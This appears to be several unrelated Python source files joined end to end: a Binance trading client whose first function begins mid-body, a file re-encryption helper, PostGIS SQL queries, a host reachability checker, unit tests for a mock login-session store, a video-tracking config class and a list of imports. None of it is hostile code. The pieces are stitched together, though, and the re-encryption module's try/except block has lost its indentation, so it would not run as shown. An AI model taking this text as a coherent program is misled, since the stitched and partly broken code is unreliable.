    return requests.get(baseURL + candlestickURL, headers={"X-MBX-APIKEY": token}, params=query).json()
def get24HrSwing(token, symbol=None):
    """Fetch 24-hour rolling ticker statistics (for one symbol, or all if None)."""
    query = {"symbol": symbol}
    return requests.get(baseURL + dayURL, headers={"X-MBX-APIKEY": token}, params=query).json()
def getPrice(token, symbol=None):
    """Fetch the latest price (for one symbol, or all symbols if None)."""
    query = {"symbol": symbol}
    return requests.get(baseURL + priceURL, headers={"X-MBX-APIKEY": token}, params=query).json()
def getBookTicker(token, symbol=None):
    """Fetch best bid/ask price and quantity (for one symbol, or all if None)."""
    query = {"symbol": symbol}
    return requests.get(baseURL + bookTickerURL, headers={"X-MBX-APIKEY": token}, params=query).json()
def newOrder(token, secretKey, symbol, side, orderType, quantity, timestamp=None, timeInForce=None, price=None, newClientOrderId=None, stopPrice=None, newOrderRespType=None, recvWindow=None, live=False):
    """Submit a new order to Binance (test endpoint unless live=True).

    *Arguments*:
     - token / secretKey = API key and (bytes) secret used to sign the request.
     - symbol, side, orderType, quantity = mandatory order parameters.
     - timestamp = request timestamp in ms; fetched from the server when None.
     - timeInForce, price, newClientOrderId, stopPrice, newOrderRespType,
       recvWindow = optional parameters, included only when not None.
     - live = if True, POST to the real order endpoint; otherwise the test endpoint.
    Returns the decoded JSON response.

    Fixes relative to the previous revision:
     - `timestamp` previously defaulted to `getTimestamp()`, which was evaluated
       once at import time — producing a stale timestamp (and a network call on
       import). It is now fetched per call.
     - the module-level `orderURL` is no longer mutated via `global` when
       live is False; the old code permanently redirected all subsequent live
       orders to the test endpoint.
     - the signed query string previously contained the mojibake "×tamp"
       (a collapsed "&times..." HTML entity) instead of "&timestamp", producing
       invalid signatures.
    """
    # choose the endpoint locally instead of rebinding the module-level orderURL
    if live != True:
        endpoint = testNewOrderURL
    else:
        endpoint = orderURL
    if timestamp is None:
        timestamp = getTimestamp()  # Binance requires a fresh millisecond timestamp per signed request
    data = {
        "symbol": symbol,
        "side": side,
        "type": orderType,
        "quantity": quantity,
        "timestamp": timestamp,
    }
    message = "symbol={0}&side={1}&type={2}&quantity={3}&timestamp={4}".format(symbol, side, orderType, quantity, timestamp)
    # Optional parameters are appended, in a fixed order, to both the signed
    # message and the POST payload so the signature matches the request body.
    optional = [
        ("timeInForce", timeInForce),
        ("price", price),
        ("newClientOrderId", newClientOrderId),
        ("stopPrice", stopPrice),
        ("newOrderRespType", newOrderRespType),
        ("recvWindow", recvWindow),
    ]
    for name, value in optional:
        if value is not None:
            message += "&{0}={1}".format(name, value)
            data[name] = value
    signature = getSignature(message.encode('utf-8'), secretKey)
    data['signature'] = signature
    return requests.post(baseURL + endpoint, headers={"X-MBX-APIKEY": token}, data=data).json()
def getOrderStatus(token, secretKey, symbol, timestamp=None, orderId=None, origClientId=None, recvWindow=None):
    """Query a single order's status (signed endpoint).

    Identify the order via orderId or origClientId; timestamp defaults to
    the current server timestamp, evaluated per call.
    """
    # BUG FIX: evaluate the timestamp per call (old default ran at import time).
    if timestamp is None:
        timestamp = getTimestamp()
    # BUG FIX: '&timestamp' had been corrupted to the mojibake '×tamp'.
    message = "symbol={0}&timestamp={1}".format(symbol, timestamp)
    params = {
        "symbol": symbol,
        "timestamp": timestamp,
    }
    if orderId:
        params['orderId'] = orderId
        message += "&orderId={}".format(orderId)
    if origClientId:
        params['origClientId'] = origClientId
        message += "&origClientId={}".format(origClientId)
    if recvWindow:
        params['recvWindow'] = recvWindow
        message += "&recvWindow={}".format(recvWindow)
    params['signature'] = getSignature(message.encode('utf-8'), secretKey)
    return requests.get(baseURL + orderURL, headers={"X-MBX-APIKEY": token}, params=params).json()
def cancelOrder(token, secretKey, symbol, timestamp=None, orderId=None, origClientId=None, newClientOrderId=None, recvWindow=None):
    """Cancel an open order (signed endpoint).

    Identify the order via orderId or origClientId; the optional-parameter
    order below matches the params dict so the signed string equals the
    actual query string.
    """
    # BUG FIX: evaluate the timestamp per call (old default ran at import time).
    if timestamp is None:
        timestamp = getTimestamp()
    # BUG FIX: '&timestamp' had been corrupted to the mojibake '×tamp'.
    message = "symbol={0}&timestamp={1}".format(symbol, timestamp)
    params = {
        "symbol": symbol,
        "timestamp": timestamp,
    }
    if orderId:
        params['orderId'] = orderId
        message += "&orderId={}".format(orderId)
    if origClientId:
        params['origClientId'] = origClientId
        message += "&origClientId={}".format(origClientId)
    if recvWindow:
        params['recvWindow'] = recvWindow
        message += "&recvWindow={}".format(recvWindow)
    if newClientOrderId:
        params['newClientOrderId'] = newClientOrderId
        message += "&newClientOrderId={}".format(newClientOrderId)
    params['signature'] = getSignature(message.encode('utf-8'), secretKey)
    return requests.delete(baseURL + orderURL, headers={"X-MBX-APIKEY": token}, params=params).json()
def getOpenOrders(token, secretKey, timestamp=None, symbol=None, recvWindow=None):
    """List open orders, optionally restricted to one symbol (signed endpoint)."""
    # BUG FIX: evaluate the timestamp per call (old default ran at import time).
    if timestamp is None:
        timestamp = getTimestamp()
    message = "timestamp={}".format(timestamp)
    params = {
        "timestamp": timestamp
    }
    if symbol:
        params['symbol'] = symbol
        message += "&symbol={}".format(symbol)
    if recvWindow:
        params['recvWindow'] = recvWindow
        # BUG FIX: the signed message had a stray '&' ("&recvWindow=&{}"),
        # making the signature disagree with the actual query string.
        message += "&recvWindow={}".format(recvWindow)
    params['signature'] = getSignature(message.encode('utf-8'), secretKey)
    return requests.get(baseURL + openOrdersURL, headers={"X-MBX-APIKEY": token}, params=params).json()
def getAllOrders(token, secretKey, symbol, timestamp=None, recvWindow=None, limit=None, orderId=None):
    """List all orders (open, filled, cancelled) for *symbol* (signed endpoint)."""
    # BUG FIX: evaluate the timestamp per call (old default ran at import time).
    if timestamp is None:
        timestamp = getTimestamp()
    # BUG FIX: '&timestamp' had been corrupted to the mojibake '×tamp'.
    message = "symbol={0}&timestamp={1}".format(symbol, timestamp)
    params = {
        "symbol": symbol,
        "timestamp": timestamp,
    }
    if orderId:
        params['orderId'] = orderId
        message += "&orderId={}".format(orderId)
    if limit:
        params['limit'] = limit
        message += "&limit={}".format(limit)
    if recvWindow:
        params['recvWindow'] = recvWindow
        message += "&recvWindow={}".format(recvWindow)
    params['signature'] = getSignature(message.encode('utf-8'), secretKey)
    return requests.get(baseURL + allOrdersURL, headers={"X-MBX-APIKEY": token}, params=params).json()
def getAccountInfo(token, secretKey, timestamp=None, recvWindow=None):
    """Fetch current account information and balances (signed endpoint)."""
    # BUG FIX: evaluate the timestamp per call (old default ran at import time).
    if timestamp is None:
        timestamp = getTimestamp()
    message = "timestamp={}".format(timestamp)
    params = {
        "timestamp": timestamp
    }
    if recvWindow:
        params['recvWindow'] = recvWindow
        message += "&recvWindow={}".format(recvWindow)
    params['signature'] = getSignature(message.encode('utf-8'), secretKey)
    return requests.get(baseURL + accountInfoURL, headers={"X-MBX-APIKEY": token}, params=params).json()
def getTrades(token, secretKey, symbol, timestamp=None, limit=None, fromId=None, recvWindow=None):
    """Fetch the account's own trades for *symbol* (signed endpoint)."""
    # BUG FIX: evaluate the timestamp per call (old default ran at import time).
    if timestamp is None:
        timestamp = getTimestamp()
    # BUG FIX: '&timestamp' had been corrupted to the mojibake '×tamp'.
    message = "symbol={0}&timestamp={1}".format(symbol, timestamp)
    params = {
        "symbol": symbol,
        "timestamp": timestamp,
    }
    if recvWindow:
        params['recvWindow'] = recvWindow
        message += "&recvWindow={}".format(recvWindow)
    if limit:
        params['limit'] = limit
        message += "&limit={}".format(limit)
    if fromId:
        params['fromId'] = fromId
        message += "&fromId={}".format(fromId)
    params['signature'] = getSignature(message.encode('utf-8'), secretKey)
    return requests.get(baseURL + accountTradesURL, headers={"X-MBX-APIKEY": token}, params=params).json()
def buyAdvised(token, symbol, threshhold, startingPrice=None, pollingInterval=None):
    """Poll until the price drops *threshhold* percent below *startingPrice*.

    Blocks forever until the drop occurs, then prints and returns True.
    pollingInterval is the sleep between polls in seconds (default 1).
    """
    # BUG FIX: 'interval' was only assigned when pollingInterval was None, so
    # passing a custom interval raised NameError at the first sleep; the
    # supplied value was also never used.
    interval = 1 if pollingInterval is None else pollingInterval
    if startingPrice is None:
        startingPrice = float(getPrice(token, symbol)['price'])
    while True:
        currentPrice = float(getPrice(token, symbol)['price'])
        currentDifference = (1 - (currentPrice / startingPrice)) * 100
        if currentDifference >= threshhold:
            print("buy advised\nstartingPrice: {0}\ncurrentPrice: {1}".format(startingPrice, currentPrice))
            return True
        print("Not Yet:\nstartingPrice: {0}\ncurrentPrice: {1}".format(startingPrice, currentPrice))
        time.sleep(interval)
def sellAdvised(token, symbol, threshhold, startingPrice=None, pollingInterval=None):
    """Poll until the price rises *threshhold* percent above *startingPrice*.

    Blocks forever until the rise occurs, then prints and returns True.
    pollingInterval is the sleep between polls in seconds (default 1).
    """
    # BUG FIX: 'interval' was only assigned when pollingInterval was None, so
    # passing a custom interval raised NameError at the first sleep; the
    # supplied value was also never used.
    interval = 1 if pollingInterval is None else pollingInterval
    if startingPrice is None:
        startingPrice = float(getPrice(token, symbol)['price'])
    while True:
        currentPrice = float(getPrice(token, symbol)['price'])
        currentDifference = ((currentPrice - startingPrice) / startingPrice) * 100
        if currentDifference >= threshhold:
            print("sell advised\nstartingPrice: {0}\ncurrentPrice: {1}".format(startingPrice, currentPrice))
            return True
        print("Not Yet:\nstartingPrice: {0}\ncurrentPrice: {1}".format(startingPrice, currentPrice))
        time.sleep(interval)
# NOTE(review): module-level call -- this polls forever as a side effect of
# running the file; 'token' must be defined earlier in the module.
buyAdvised(token, "XRPETH", 1)
#print(newOrder(token, secretKey, "ETHBTC", "BUY", "LIMIT", "1", price=.9, timeInForce="GTC", live=False))
|
import logging
import tempfile
import typing
from datetime import datetime
import arrow
from blazeutils.helpers import ensure_list
try:
import keg_elements.crypto as ke_crypto
except ImportError:
ke_crypto = None
# Expected symmetric-key length in bytes (32 bytes = 256-bit keys).
DEFAULT_KEY_SIZE = 32
log = logging.getLogger(__name__)
class DecryptionException(Exception):
    """Raised when a stored file cannot be decrypted with any candidate key."""
    pass
class EncryptionKeyException(Exception):
    """Raised when no usable encryption keys are found or the new key is the wrong size."""
    pass
class MissingDependencyException(Exception):
    """Raised when the optional keg_elements.crypto dependency is not installed."""
    pass
def verify_key_length(key, expected=DEFAULT_KEY_SIZE):
    """Return True when *key* is exactly *expected* bytes long."""
    actual = len(key)
    return actual == expected
def reencrypt(storage, path, old_key, new_key):
    """Fetch *path* from *storage*, decrypt it with one of the *old_key*
    candidates, and re-upload it encrypted under *new_key*.

    *old_key* may be a single key or a list; keys that fail the length check
    are silently dropped. Raises MissingDependencyException when keg_elements
    is unavailable, EncryptionKeyException for missing/mis-sized keys, and
    DecryptionException when no key can decrypt the file.
    """
    if ke_crypto is None:
        raise MissingDependencyException('Keg Elements is required for crypto operations')
    old_key = ensure_list(old_key)
    # We append the new key just in case the operation was restarted and we have already encrypted
    # some files
    keys = list(filter(verify_key_length, old_key + [new_key]))
    if not keys:
        raise EncryptionKeyException('No Keys Found')
    else:
        log.info('Found {} keys'.format(len(keys)))
    if not verify_key_length(new_key, expected=DEFAULT_KEY_SIZE):
        raise EncryptionKeyException('New key is not the correct size. Got {}, expecting {}'.format(
            len(new_key), DEFAULT_KEY_SIZE
        ))
    # Both temp files live for the whole re-encrypt round trip: one holds the
    # downloaded ciphertext, the other the newly encrypted output.
    with tempfile.NamedTemporaryFile() as old_key_local, \
            tempfile.NamedTemporaryFile() as new_key_local:
        log.info('Fetching {}'.format(path))
        storage.get(path, old_key_local.name)
        old_key_bytes = None
        # Try each candidate key in order. NOTE(review): there is no break on
        # success, so the remaining keys are still attempted (and logged as
        # failures) after a successful decrypt; a later "success" would
        # overwrite the earlier plaintext -- confirm this is intended.
        for idx, key in enumerate(keys):
            try:
                log.info('Trying to decrypt {}.'.format(path))
                old_key_bytes = ke_crypto.decrypt_bytesio(key, old_key_local.name)
                log.info('Successfully Decrypted {} with key {}.'.format(path, idx))
            except Exception as e:
                log.info('Key {} failed for {}'.format(idx, path))
                # A padding error just means "wrong key" -- move on to the
                # next candidate; anything else is logged as unexpected but
                # the loop still continues.
                if str(e) == 'Invalid padding bytes.':
                    continue
                log.error('Unhandled error for decrypt with key {}: {}.'.format(idx, str(e)))
        if old_key_bytes is None:
            raise DecryptionException('Unable to Decrypt File {}'.format(path))
        log.info('Re-encrypting {}'.format(path))
        new_key_bytes = ke_crypto.encrypt_fileobj(new_key, old_key_bytes)
        log.info('Writing newly encrypted data {}.'.format(path))
        # encrypt_fileobj yields chunks; stream them to the temp file, then
        # flush before handing the file name to storage.put.
        for chunk in new_key_bytes:
            new_key_local.write(chunk)
        new_key_local.flush()
        storage.put(new_key_local.name, path)
        log.info('Re-encryption complete for {}.'.format(path))
def expire_time_to_seconds(
    expire_time: typing.Union[arrow.Arrow, datetime],
    *,
    now: typing.Callable[[], arrow.Arrow] = arrow.utcnow
):
    """Return the number of seconds from *now* until *expire_time*.

    Raises ValueError when the expiration time is already in the past.
    """
    current = now()
    target = arrow.get(expire_time) if isinstance(expire_time, datetime) else expire_time
    if target < current:
        raise ValueError('Expiration time is in the past')
    return (target - current).total_seconds()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
get_nvl_circle_list_query = """
SELECT ncr.id AS id,
ST_FlipCoordinates(ncr.geom)::geometry AS geom,
ncr.label AS label,
ncr.color AS color,
ncr.radius AS radius,
ncr.location_id AS location_id,
ncr.user_id AS user_id,
ncr.active AS active,
ncr.deleted AS deleted
FROM public.nvl_circle AS ncr
LEFT OUTER JOIN public.location AS nloc ON nloc.id = ncr.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = ncr.user_id
WHERE ncr.deleted is FALSE
AND ($1::BIGINT is NULL OR ncr.user_id = $1::BIGINT)
AND (
$2::VARCHAR is NULL OR
ncr.label ILIKE $2::VARCHAR || '%' OR
ncr.label ILIKE '%' || $2::VARCHAR || '%' OR
ncr.label ILIKE $2::VARCHAR || '%')
"""
get_nvl_circle_list_count_query = """
SELECT count(*) AS nvl_circle_count
FROM public.nvl_circle AS ncr
LEFT OUTER JOIN public.location AS nloc ON nloc.id = ncr.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = ncr.user_id
WHERE ncr.deleted is FALSE
AND (
$2::VARCHAR is NULL OR
ncr.label ILIKE $2::VARCHAR || '%' OR
ncr.label ILIKE '%' || $2::VARCHAR || '%' OR
ncr.label ILIKE $2::VARCHAR || '%')
"""
get_nvl_circle_element_query = """
SELECT ncr.id AS id,
ST_FlipCoordinates(ncr.geom)::geometry AS geom,
ncr.label AS label,
ncr.color AS color,
ncr.radius AS radius,
ncr.location_id AS location_id,
ncr.user_id AS user_id,
ncr.active AS active,
ncr.deleted AS deleted
FROM public.nvl_circle AS ncr
LEFT OUTER JOIN public.location AS nloc ON nloc.id = ncr.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = ncr.user_id
WHERE ncr.deleted is FALSE
AND ($1::BIGINT is NULL OR ncr.user_id = $1::BIGINT)
AND ncr.id = $2::BIGINT
"""
get_nvl_circle_element_by_location_id_query = """
SELECT ncr.id AS id,
ST_FlipCoordinates(ncr.geom)::geometry AS geom,
ncr.label AS label,
ncr.color AS color,
ncr.radius AS radius,
ncr.location_id AS location_id,
ncr.user_id AS user_id,
ncr.active AS active,
ncr.deleted AS deleted
FROM public.nvl_circle AS ncr
LEFT OUTER JOIN public.location AS nloc ON nloc.id = ncr.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = ncr.user_id
WHERE ncr.deleted is FALSE
AND ($1::BIGINT is NULL OR ncr.user_id = $1::BIGINT)
AND ncr.location_id = $2::BIGINT
ORDER BY ncr.created_on DESC LIMIT 1
"""
get_nvl_circle_list_by_user_id_query = """
SELECT ncr.id AS id,
ST_FlipCoordinates(ncr.geom)::geometry AS geom,
ncr.label AS label,
ncr.color AS color,
ncr.location_id AS location_id,
ncr.user_id AS user_id,
ncr.radius AS radius,
loc.location_type_id AS location_type_id,
ltp.name AS location_type,
loc.user_id AS user_id,
loc.name AS location_name,
usr.fullname AS user_fullname,
loc.show_on_map AS show_on_map,
ncr.active AS active,
ncr.deleted AS deleted
FROM public.nvl_circle AS ncr
LEFT OUTER JOIN public.location AS loc ON loc.id = ncr.location_id
LEFT OUTER JOIN public.location_type AS ltp ON ltp.id = loc.location_type_id
LEFT OUTER JOIN public.user AS usr ON usr.id = ncr.user_id
WHERE ncr.deleted is FALSE
AND loc.deleted is FALSE
AND ($1::BIGINT is NULL OR ncr.user_id = $1::BIGINT)
AND loc.show_on_map IS TRUE
ORDER BY ncr.created_on DESC
"""
|
import requests
import subprocess
import socket
# Targets to probe: URLs over HTTP(S), IPs over ICMP/reverse DNS.
urls = ['https://google.co.uk', 'https://bbc.co.uk']
ips = ["192.168.167.20", "192.168.167.6"]
# Result accumulators filled in by the check functions below.
urlReached = []
urlNotReached = []
reached = []
not_reached = []
reverse_dns = []
def request_test(sites):
    """HTTP-GET each URL in *sites*, sorting them into urlReached/urlNotReached.

    Only a 200 status counts as reachable.
    """
    # BUG FIX: the old code ignored the 'sites' argument and iterated the
    # module-level 'urls' list instead.
    for url in sites:
        resp = requests.get(url)
        if resp.status_code == 200:
            urlReached.append(url)
        else:
            urlNotReached.append(url)
def ping_test(ips):
    """Ping each IP in *ips*, sorting them into reached/not_reached."""
    for ip in ips:
        # BUG FIX: pass the command as an argument list (no shell string) --
        # a plain string without shell=True is not portable. '-n 2' is the
        # Windows count flag; NOTE(review): on POSIX the flag is '-c', confirm
        # the target platform.
        result = subprocess.call(['ping', ip, '-n', '2'])
        # Exit code 0 means at least one reply was received.
        if result == 0:
            reached.append(ip)
        else:
            not_reached.append(ip)
def nslookup_test(hosts):
    """Reverse-resolve each address in *hosts* into the reverse_dns list."""
    # BUG FIX: the old code ignored the 'hosts' argument and iterated the
    # module-level 'ips' list instead.
    for host in hosts:
        # getfqdn falls back to the input string when no PTR record exists.
        reverse_dns.append(socket.getfqdn(host))
# Run all three checks, then print a summary. (The output strings misspell
# "accessible"; left unchanged because they are runtime output, not comments.)
ping_test(ips)
request_test(urls)
nslookup_test(ips)
print("these urls were not accessable over http/https : " + str(urlNotReached))
print("these urls were accessable over http/https : " + str(urlReached))
print("these ips were accessable over ping : " + str(reached))
print("these ips were not accessable over ping : " + str(not_reached))
print("these DNS records were resolved from IP list : " + str(reverse_dns))
|
from __future__ import absolute_import, division, unicode_literals
import six
from datetime import datetime
import re
from twisted.trial.unittest import SynchronousTestCase
from twisted.internet.task import Clock
from mimic.session import NonMatchingTenantError, SessionStore
class SessionCreationTests(SynchronousTestCase):
    """
    Tests for :class:`SessionStore`.
    """
    def test_username_password_new(self):
        """
        SessionStore.session_for_username_password creates a new session (if no
        such session exists for the given username).
        """
        clock = Clock()
        sessions = SessionStore(clock)
        clock.advance(4321)
        session = sessions.session_for_username_password("example_user",
                                                         "password")
        self.assertEqual(session.username, "example_user")
        self.assertEqual(session.expires,
                         datetime.utcfromtimestamp(4321 + 86400))
        self.assertIsInstance(session.tenant_id, six.text_type)
        self.assertIsInstance(session.token, six.text_type)
        self.assertNotEqual(session.username, session.token)
        self.assertNotEqual(session.token, session.tenant_id)
    def test_username_password_wrong_tenant(self):
        """
        Tenant ID is validated in
        :func:`SessionStore.session_for_username_password`.

        If called with the username of an existing session but the wrong
        tenant, raises :class:`NonMatchingTenantError`.
        """
        # FIX: the method previously contained a second, stray triple-quoted
        # string after the docstring (a no-op statement); merged into one.
        clock = Clock()
        sessions = SessionStore(clock)
        clock.advance(4321)
        sessions.session_for_username_password("example_user",
                                               "password",
                                               "tenant_orig")
        self.assertRaises(
            NonMatchingTenantError,
            sessions.session_for_username_password,
            "example_user", "password", "tenant_new")
    def test_different_username_different_token(self):
        """
        Sessions are distinct if they are requested with distinct usernames.
        """
        sessions = SessionStore(Clock())
        a = sessions.session_for_username_password("a", "ignored")
        b = sessions.session_for_username_password("b", "ignored")
        self.assertNotEqual(a.token, b.token)
    def test_by_username_after_token(self):
        """
        SessionStore.session_for_username_password should retrieve the same
        session that was created by SessionStore.session_for_token. Similarly
        for the API key.
        """
        sessions = SessionStore(Clock())
        a = sessions.session_for_token("testtoken")
        b = sessions.session_for_username_password(a.username, "testpswd")
        c = sessions.session_for_api_key(a.username, "testapikey")
        self.assertIdentical(a, b)
        self.assertIdentical(a, c)
    def test_session_for_apikey_after_username_wrong_tenant(self):
        """
        Tenant ID is validated in :func:`SessionStore.session_for_api_key`.
        If called with the token of an existing session but the wrong tenant,
        raises :class:`NonMatchingTenantError`.
        """
        sessions = SessionStore(Clock())
        a = sessions.session_for_username_password("username", "testpswd")
        self.assertRaises(
            NonMatchingTenantError,
            sessions.session_for_api_key,
            a.username, "testapikey", a.tenant_id + "wrong")
    def test_by_token_after_username(self):
        """
        Session retrieved by all the ``session_for_*`` methods are identical.
        :func:`SessionStore.session_for_token` should retrieve the same
        session that was created by
        :func:`SessionStore.session_for_username_password`.
        """
        sessions = SessionStore(Clock())
        a = sessions.session_for_username_password("username",
                                                   "testpswd")
        b = sessions.session_for_token(a.token)
        self.assertIdentical(a, b)
        c = sessions.session_for_api_key("apiuser", "testkey")
        d = sessions.session_for_token(c.token)
        self.assertIdentical(c, d)
    def test_by_token_after_username_wrong_tenant(self):
        """
        Tenant ID is validated in :func:`SessionStore.session_for_token`.
        If called with the token of an existing session but the wrong tenant,
        raises :class:`NonMatchingTenantError`.
        """
        sessions = SessionStore(Clock())
        a = sessions.session_for_username_password("username",
                                                   "testpswd")
        self.assertRaises(
            NonMatchingTenantError,
            sessions.session_for_token,
            a.token, a.tenant_id + 'wrong')
    def test_impersonation(self):
        """
        SessionStore.session_for_impersonation will return a session that can
        be retrieved by impersonated token_id or username.
        """
        clock = Clock()
        sessions = SessionStore(clock)
        A_LITTLE = 1234
        clock.advance(A_LITTLE)
        A_LOT = 65432
        a = sessions.session_for_impersonation("pretender", A_LOT)
        a_prime = sessions.session_for_impersonation("pretender", A_LOT)
        self.assertIdentical(a, a_prime)
        b = sessions.session_for_token(a.token)
        self.assertEqual(
            a.expires, datetime.utcfromtimestamp(A_LITTLE + A_LOT))
        self.assertIdentical(a, b)
        c = sessions.session_for_username_password("pretender",
                                                   "not a password")
        self.assertIdentical(a, c)
        self.assertEqual(a.username, c.username)
        self.assertEqual(a.tenant_id, c.tenant_id)
        # Right now all data_for_api cares about is hashability; this may need
        # to change if it comes to rely upon its argument actually being an API
        # mock.
        same_api = 'not_an_api'
        username_data = c.data_for_api(same_api, list)
        token_data = b.data_for_api(same_api, list)
        impersonation_data = a.data_for_api(same_api, list)
        self.assertIs(username_data, impersonation_data)
        self.assertIs(token_data, impersonation_data)
    def test_session_for_tenant_id(self):
        """
        SessionStore.session_for_tenant_id will return a session that can be
        retrieved by tenant_id.
        """
        clock = Clock()
        sessions = SessionStore(clock)
        session = sessions.session_for_username_password("someuser",
                                                         "testpass")
        session2 = sessions.session_for_tenant_id(session.tenant_id)
        self.assertIdentical(session, session2)
    def test_generate_username_from_tenant_id(self):
        """
        SessionStore.session_for_tenant_id will create a new session with a
        synthetic username if no such tenant ID yet exists.
        """
        clock = Clock()
        sessions = SessionStore(clock)
        session = sessions.session_for_tenant_id("user_specified_tenant")
        session2 = sessions.session_for_username_password(session.username,
                                                          "testpass")
        self.assertIdentical(session, session2)
    def test_session_for_tenant_id_with_custom_tenant(self):
        """
        SessionStore.session_for_tenant_id will return a session that can be
        retrieved by tenant_id.
        """
        clock = Clock()
        sessions = SessionStore(clock)
        session = sessions.session_for_username_password(
            "someuser", "testpass", "sometenant"
        )
        session2 = sessions.session_for_tenant_id("sometenant")
        self.assertIdentical(session, session2)
    def test_sessions_created_all_have_integer_tenant_ids(self):
        """
        Sessions created by
        :class:`SessionStore.session_for_username_password`,
        :class:`SessionStore.session_for_impersonation`,
        :class:`SessionStore.session_for_api_key`, and
        :class:`SessionStore.session_for_token`, when not passed a specific
        tenant ID, all generate integer-style tenant IDs.
        """
        clock = Clock()
        # FIX: the store was previously shadowed by the result list (both
        # named 'sessions'); keep the store and the created sessions distinct.
        store = SessionStore(clock)
        created = [
            store.session_for_username_password("someuser1", "testpass"),
            store.session_for_impersonation("someuser2", 12),
            store.session_for_api_key("someuser3", "someapikey"),
            store.session_for_token("sometoken"),
        ]
        # FIX: use a raw string so '\d' is a regex digit class, not an
        # invalid string escape (DeprecationWarning/SyntaxWarning in py3).
        integer = re.compile(r'^\d+$')
        for session in created:
            self.assertIsNot(integer.match(session.tenant_id), None,
                             "{0} is not an integer.".format(
                                 session.tenant_id))
            self.assertTrue(int(session.tenant_id) < 1e15)
    def test_sessions_created_honor_specified_tenant_id(self):
        """
        Sessions created by
        :class:`SessionStore.session_for_username_password`,
        :class:`SessionStore.session_for_api_key`, and
        :class:`SessionStore.session_for_token`,
        :class:`SessionStore.session_for_tenant_id` all honor the passed-in
        tenant ID.
        """
        clock = Clock()
        # FIX: avoid shadowing the store with the result list (see above).
        store = SessionStore(clock)
        created = [
            store.session_for_username_password("user1", "pass",
                                                "tenant1"),
            store.session_for_api_key("user2", "apikey",
                                      tenant_id="tenant2"),
            store.session_for_token("token", tenant_id="tenant3"),
            store.session_for_tenant_id("tenant4")
        ]
        for i, session in enumerate(created):
            self.assertEqual("tenant{0}".format(i + 1), session.tenant_id)
    def test_token_after_api_key_specifying_tenant(self):
        """
        Sessions created by
        :class:`SessionStore.session_for_api_key` and specifying
        the tenant ID should be returned on requests to
        :class:`SessionStore.session_for_token` that also specify
        the same tenant ID.
        """
        clock = Clock()
        sessions = SessionStore(clock)
        session_by_api_key = sessions.session_for_api_key(
            "user1", "f005ba11", tenant_id="559638")
        session_by_token = sessions.session_for_token(
            "token", tenant_id="559638")
        self.assertIs(session_by_api_key, session_by_token)
    def test_username_password_after_token_specifying_tenant(self):
        """
        Sessions created by
        :class:`SessionStore.session_for_token` and specifying
        the tenant ID should be returned on requests to
        :class:`SessionStore.session_for_username_password` that
        also specify the same tenant ID.
        """
        clock = Clock()
        sessions = SessionStore(clock)
        session_by_token = sessions.session_for_token("token", tenant_id="tenant1337")
        session_by_username_password = sessions.session_for_username_password(
            "user1", "pass", "tenant1337")
        self.assertIs(session_by_token, session_by_username_password)
|
class Configs(object):
    """
    Configs(Routes) for the whole detection/tracking system.

    All values are plain attributes set in __init__; attribute names are the
    public interface read by the detector/tracker/visualizer modules, so they
    are kept as-is (including the existing BBXES_IDENTICAL_IOS_TRHESHOLD
    spelling -- renaming it would break consumers).
    """
    def __init__(self):
        """ Sever or Local """
        self.S_or_L = 'S'  # running on sever or local environment. 's' or 'S': sever, 'l' or 'L': local
        # self.VID_NAME = '/Users/huike/master/video/demo.mp4'
        self.VID_NAME = 'demo.mp4'  # input video file
        self.VID_SAVING_NAME = 'save_video'  # output video base name
        self.VID_SAVING_BLOB_NAME = 'VID_SAVING_BLOB_NAME'
        """
        Detector
        """
        self.AREA_MAXIMUM = 10000000  # Instance which area is bigger than this number will not be regarded as an
        # independent instance
        self.AREA_MINIMUM = 400  # Instance which area is smaller than this number will not be regarded as a
        # valid instance
        self.WH_RATIO_THRE = 3  # max(width, height) / min(width, height)
        self.COOLING_FRAME = 100  # For some reasons, yolo is not good enough to detect blurred objects. We guess blob
        # analysis may be a better choice thus we need a time to build up our background.
        self.BACK_HISTORY_FRAME = 300  # We use these frames to build up background model in real sense.
        # It should be less than COOLING_FRAME
        self.BACK_THRESHOLD = 100  # Threshold of background model. The higher, the more inertial.
        self.BACK_IF_DETECT_SHADOW = False  # Whether to detect shadow
        self.BACK_RESIZE_BORDER = 480  # resize bounds used by background subtraction
        self.BACK_RESIZE_HEIGHT = 240
        self.BACK_RESIZE_WIDTH = 320
        self.USE_RE_MODEL = False  # whether to use the re-identification model
        """
        # Multiple Object Controller Parameters
        """
        # it's better to set to ratio of bboxes cause smaller ones means shorter dist and vice versa.
        self.MAX_PIXELS_DIST_BETWEEN_PREDICTED_AND_DETECTED = 45
        # detect per NUM_JUMP_FRAMES frames. D, N, N, N, D, N, ...
        self.NUM_JUMP_FRAMES = 5
        self.VELOCITY_DIRECTION_SEPARATOR = 90  # degrees separating direction classes
        """
        # Instance Parameters
        """
        # An instance will be deleted if we cannot detected it after this number
        self.MAX_NUM_MISSING_PERMISSION = self.NUM_JUMP_FRAMES+1
        # An instance will be showed if we detected it more than this number
        self.MIN_CONTINUE_DETECTOR = 2
        # We save historical frames for each instance within this number
        self.HISTORY_SIZE = 20
        # we need to do get rid of those identical instances generated
        # but it's not good in real experiments
        self.INSTANCE_IDENTICAL_THRESHOLD = 50
        # so we set iou threshold to do the same thing
        self.INSTANCE_IDENTICAL_IOU_THRESHOLD = 0.3
        # we also set ios (inter over self) threshold
        # for conditions where two instances' areas are different tremendously
        # NOTE(review): attribute name misspells "THRESHOLD"; kept for
        # backward compatibility with existing consumers.
        self.BBXES_IDENTICAL_IOS_TRHESHOLD = 0.35
        # If bbx remains same within this # of frames, we delete it.
        self.NUM_DELETE_STILL = self.NUM_JUMP_FRAMES + 1
        """
        Visualizer Parameters
        """
        # By using CPU, we can use this flag to decide whether to show results directly or not
        self.to_show = False
        self.show_path = 'vis/'  # save images path
        # If the video is too long, we gonna stop it at this frame
        self.FINISH_CUT_FRAME = 0
        self.COLOR_FADING_PARAM = self.HISTORY_SIZE  # track colors fade over this many frames
        self.SHOW_FRAME_ID = True
        self.SHOW_COLLISION_THRE = 50
        self.SHOW_TRACKS = True
|
import matplotlib as mpl
mpl.use('Agg')
import utils
import os
import time
import argparse
import torch
import torch.utils.data
import torchvision.datasets as dset
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
from tqdm import tqdm
from options import TestOptions
from loader import PepeLoader
from models import Pix2PixModel
